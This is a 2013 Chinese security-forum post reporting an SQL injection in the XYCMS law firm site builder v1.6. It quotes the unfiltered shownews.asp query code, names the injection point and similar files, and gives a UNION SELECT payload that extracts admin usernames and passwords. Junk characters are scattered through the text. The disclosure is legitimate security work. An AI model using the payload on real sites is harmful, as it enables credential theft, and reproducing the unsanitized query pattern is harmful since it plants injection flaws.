前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似2 _9 y& Y# Q: r+ \) w) ^! {0 j
; z. k ~' F! [) N5 ?0 Z
淫荡分割线
. T5 J' t- \; O* y9 j9 S--------------------------------------------------------7 t z8 y3 u. x& O1 N l8 K& g. d7 k
" {! m& O$ T% }+ O. K; v; p; Y3 J审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)% H! p& ~: F/ p N
源码地址:http://down.chinaz.com/soft/29233.htm
8 G+ r+ M' z; W
t! A1 z% e( |& `6 c) g漏洞文件:shownews.asp' H5 m: F$ X7 v2 g8 Y
漏洞代码:7-13行
+ E5 x/ Y2 ~' U0 Q$ `7 g$ V! d
, P# F$ l+ P9 f3 s5 Z/ h" g ! L D5 g2 \( x8 l# [+ D
<%
1 |& f: i! V1 j) pid=request.QueryString("id"). Z' a* l! ^# R. M4 u) [6 n
; U" i6 _+ c' @( ~) N+ s" f
set snews=server.createobject("adodb.recordset") , m! q' I! w/ A6 ~4 y
exec="select * from [news] where id="&id
8 w& s; c* K# s/ ? @2 Ksnews.open exec,conn,1,1
" F" Y4 I/ S' L0 F# M%>
6 G; _" Q2 G) c' p- B8 S
, `5 q5 Q' _) Z! w & o7 _+ U& B7 ~, y' O4 P$ Q
什么过滤都没有 直造成注入
' Z) O" G# v0 B @- e$ [2 P- S8 G; c: t
% s+ n" Q( a" ~* S8 Q注入点:http://127.0.0.1:99/shownews.asp?id=xx
|" g4 Y$ M, l' l( f8 V 1 P' t& R: G0 o7 a7 U& q: S8 [
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
- \) c' Y; q# Q B, |8 N- M
* A$ Y$ v( ?4 l
o, S# y+ D; I- |8 [ W$ v" o: Eexp: union select 1,admin,password,4,5,7 from admin_user
* _6 L; N9 s* U9 q
5 M' L) j) D2 V" d* K |
发表于 2013-4-4 17:28:12
收藏
支持
反对